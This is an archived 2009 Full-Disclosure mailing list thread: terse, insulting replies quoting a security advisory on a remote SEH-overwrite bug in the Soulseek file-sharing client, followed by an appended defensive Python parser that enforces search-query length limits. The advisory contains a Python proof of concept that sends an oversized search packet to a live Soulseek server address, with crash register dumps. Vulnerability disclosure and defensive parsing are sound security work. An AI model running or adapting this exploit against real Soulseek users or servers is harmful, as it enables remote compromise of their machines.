Message-ID: <282134E75BDEB64E943CAF38C80BDD8AD3262E@PRO-EXCHANGESRV.experian.dk>
Date: Mon, 8 Jun 2009 15:01:30 +0200
From: "Anders Klixbull" <akl@...erian.dk>
To: "Pete Licoln" <pete.licoln@...il.com>,
	"laurent gaffie" <laurent.gaffie@...il.com>,
	"full-disclosure" <full-disclosure@...ts.grok.org.uk>
Subject: Re: Soulseek * P2P Remote Distributed Search
	CodeExecution

go suck a lemon

________________________________

From: full-disclosure-bounces@...ts.grok.org.uk [mailto:full-disclosure-bounces@...ts.grok.org.uk] On Behalf Of Pete Licoln
Sent: 5. juni 2009 08:02
To: laurent gaffie; full-disclosure
Subject: Re: [Full-disclosure] Soulseek * P2P Remote Distributed Search CodeExecution


Seems like you have a problem with responsible disclosure Kid ;
Do you have any family relationship with Jeremy Brown ? ;P

http://g-laurent.blogspot.com/2009/05/soulseek-p2p-remote-distributed-search.html#comments


2009/5/25 Pete Licoln <pete.licoln@...il.com>


	Oh so you have a blog ...
	http://g-laurent.blogspot.com/
	

	2009/5/25 laurent gaffie <laurent.gaffie@...il.com>
	

		=============================================
		- Release date: May 24th, 2009
		- Discovered by: Laurent Gaffié
		- Severity: critical
		=============================================
		
		I. VULNERABILITY
		-------------------------
		Soulseek 157 NS * & 156.* Remote Distributed Search Code Execution
		
		II. BACKGROUND
		-------------------------
		"Soulseek(tm) is a unique ad-free, spyware free, and just plain free file 
		sharing application.
		One of the things that makes Soulseek(tm) unique is our community and 
		community-related features.
		Based on peer-to-peer technology, virtual rooms allow you to meet people with
		the same interests, share information, and chat freely using real-time messages
		in public or private.
		Soulseek(tm), with its built-in people matching system, is a great way to make 
		new friends and expand your mind!"
		
		III. DESCRIPTION
		-------------------------
		Soulseek client allows distributed file search to one person, everyone, or in a 
		specific Soulseek IRC channel, allowing a user to find the files he wants, in 
		a dedicated channel, or with his contacts, or on the whole network.
		Unfortunately this feature is vulnerable to a remote SEH overwrite to a specific
		user, or even to a whole Soulseek IRC channel.
		
		IV. PROOF OF CONCEPT
		-------------------------
		This proof of concept is made to prevent a S-K party, it is only built to 
		target the user "testt4321".
		
		To try this proof of concept, you would have to open a soulseek client and use
		the username:
		"testt4321"
		with the password:
		"12345678"
		And launch this code.
		If you want to change the username or target a whole channel, you would have 
		to reverse the binary protocol
		
		
		
		#!/usr/bin/python
		import struct
		import sys, socket 
		from time import *
		
		s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
		s.connect(("208.76.170.50",2242))  # Change to Port 2240 for 156* branch
		
		buffer = "\x48\x00\x00\x00\x01\x00\x00\x00\x08\x00\x00\x00\x74\x65\x73\x74"
		buffer+= "\x34\x33\x32\x31\x08\x00\x00\x00\x31\x32\x33\x34\x35\x36\x37\x38"
		buffer+= "\xb5\x00\x00\x00\x20\x00\x00\x00\x38\x65\x39\x31\x66\x37\x33\x30"
		buffer+= "\x35\x35\x37\x31\x32\x35\x64\x37\x34\x39\x32\x34\x62\x64\x66\x35"
		buffer+= "\x63\x32\x39\x61\x36\x37\x64\x61\x01\x00\x00\x00"
		
		s.send(buffer)
		sleep(1) 
		
		junk = "\x41" * 3084
		next_seh = struct.pack('<L', 0x42424242)
		seh =      struct.pack('<L', 0x43434343)
		other_junk = "\x61" * 1423
		
		buffer2 = "\x01\x0f\x00\x00\x2a\x00\x00\x00\x09\x00\x00\x00\x74\x65\x73\x74"
		buffer2+= "\x74\x34\x33\x32\x31\xa4\x5a\x51\x44\xe8\x0e\x00\x00"+junk+next_seh+seh+other_junk
		s.send(buffer2)
		sleep(1)
		s.recv(1024)
		
		
		
		After the query is sent, the memory will look like this
		0012FBE4   41414141
		0012FBE8   42424242  Pointer to next SEH record
		0012FBEC   43434343  SE handler
		0012FBF0   61616161
		
		And the program will terminate with this structure:
		EAX 00000000
		ECX 43434343
		EDX 7C9132BC ntdll.7C9132BC
		EBX 00000000
		ESP 0012EA78
		EBP 0012EA98
		ESI 00000000
		EDI 00000000
		EIP 43434343
		
		
		V. BUSINESS IMPACT
		-------------------------
		An attacker could exploit this vulnerability to compromise any Soulseek client connected to
		the Soulseek network.
		
		VI. SYSTEMS AFFECTED
		-------------------------
		Windows all versions running Soulseek *
		
		VII. SOLUTION
		-------------------------
		A fast solution would be to use Nicotine-Plus (http://nicotine-plus.sourceforge.net/) 
		a Python Soulseek client.
		Another quick workaround (at server level) would be to limit the search query length.
		
		VIII. REFERENCES
		-------------------------
		http://www.slsknet.org
		
		IX. CREDITS
		-------------------------
		This vulnerability has been discovered by Laurent Gaffié
		Laurent.gaffie{remove-this}(at)gmail.com
		
		
		X. REVISION HISTORY
		-------------------------
		May 24, 2009: Initial release
		
		
		XI. DISCLOSURE TIMELINE
		-------------------------
		July      29, 2008: Bug discovered
		September 03, 2008: Vendor contacted; no response.
		October   14, 2008: Vendor contacted; still no response.
		April     12, 2009: Idefense contacted.
		April     13, 2009: Idefense answered.
		April     23, 2009: Advisory sent to Idefense contributor program.
		May       13, 2009: Idefense contacted, bug rejected (no reason given)
		May       15, 2009: Idefense recontacted; no answer.
		May       16, 2009: Last try to contact Soulseek maintainers
		May       24, 2009: Advisory published.
		
		XII. LEGAL NOTICES
		-------------------------
		The information contained within this advisory is supplied "as-is"
		with no warranties or guarantees of fitness of use or otherwise.
		I accept no responsibility for any damage caused by the use or 
		misuse of this information.
		
		
		_______________________________________________
		Full-Disclosure - We believe in it.
		Charter: http://lists.grok.org.uk/full-disclosure-charter.html
		Hosted and sponsored by Secunia - http://secunia.com/
		





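Added example (not part of this thread, the advisory, or any Soulseek or Nicotine-Plus code): a defensive, length-checked parser for the framing the PoC bytes above show, in the spirit of the server-side workaround in section VII ("limit the search query length"). The framing (4-byte little-endian total length, 4-byte little-endian message code, then fields, with strings as a 4-byte length followed by their bytes), the (string, u32, string) layout for the code-42 message, and the MAX_STRING_LEN limit are my reading of the PoC and assumed policy values, not vendor documentation. Python 3; every declared length is validated against both the policy limit and the bytes actually received before anything is copied.

```python
import struct

# MAX_STRING_LEN is an assumed server-side policy value (the "limit the search
# query length" workaround from section VII), not a Soulseek protocol constant.
MAX_STRING_LEN = 256

# Field layout of the code-42 message as read from the PoC bytes above
# (username string, 4-byte token, query string). This is an assumption.
SEARCH_LAYOUT = ("str", "u32", "str")


class FrameError(ValueError):
    """Malformed frame or length-policy violation: the frame must be dropped."""


def build_frame(code, fields):
    """Construct a frame: ints become u32 fields, bytes become length-prefixed strings."""
    body = struct.pack("<L", code)
    for f in fields:
        if isinstance(f, int):
            body += struct.pack("<L", f)
        else:
            body += struct.pack("<L", len(f)) + f
    return struct.pack("<L", len(body)) + body


def _u32(buf, off):
    """Read a little-endian u32 at off, refusing to read past the buffer."""
    if off + 4 > len(buf):
        raise FrameError("truncated u32 at offset %d" % off)
    return struct.unpack_from("<L", buf, off)[0], off + 4


def _string(buf, off, limit):
    """Read a length-prefixed string, validating the declared length first."""
    n, off = _u32(buf, off)
    # Both checks run before any byte of the payload is copied. A declared
    # length larger than what the receiver reserved is the condition the SEH
    # overwrite above relies on; a relay enforcing this limit never forwards it.
    if n > limit:
        raise FrameError("string length %d exceeds limit %d" % (n, limit))
    if off + n > len(buf):
        raise FrameError("string length %d runs past end of frame" % n)
    return bytes(buf[off:off + n]), off + n


def parse_frame(data, layout, max_string_len=MAX_STRING_LEN):
    """Parse one frame against a layout of 'u32'/'str' fields; return (code, fields)."""
    total, off = _u32(data, 0)
    if total != len(data) - 4:
        raise FrameError("declared length %d != received %d" % (total, len(data) - 4))
    code, off = _u32(data, off)
    fields = []
    for kind in layout:
        if kind == "u32":
            value, off = _u32(data, off)
        elif kind == "str":
            value, off = _string(data, off, max_string_len)
        else:
            raise ValueError("unknown field kind %r" % kind)
        fields.append(value)
    if off != len(data):
        raise FrameError("%d trailing bytes after last field" % (len(data) - off))
    return code, fields


def check_search(data):
    """Return (ok, detail): ok is False when the frame must be dropped."""
    try:
        code, (user, token, query) = parse_frame(data, SEARCH_LAYOUT)
    except FrameError as exc:
        return False, str(exc)
    return True, "code=%d user=%s token=%#x query_len=%d" % (
        code, user.decode("ascii", "replace"), token, len(query))


# Constructed sample: declares a 100-byte query but only 3 bytes follow it.
LYING_SAMPLE = (struct.pack("<LLL", 28, 42, 9) + b"testt4321"
                + struct.pack("<LL", 0x44515AA4, 100) + b"abc")


if __name__ == "__main__":
    print(check_search(build_frame(42, [b"testt4321", 0x44515AA4, b"some search terms"])))
    # Constructed: a 4515-byte query, the size of the junk + SEH chain in the PoC.
    print(check_search(build_frame(42, [b"testt4321", 0x44515AA4, b"A" * 4515])))
    print(check_search(LYING_SAMPLE))
```

The order of checks in `_string` is the point: the policy limit rejects an oversized query outright, and the bounds check rejects a frame whose declared length exceeds what was received, so a client behind such a relay never sees either shape of input. The constant 256 is a placeholder; a real deployment would pick the limit from the longest legitimate query the service needs to carry.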
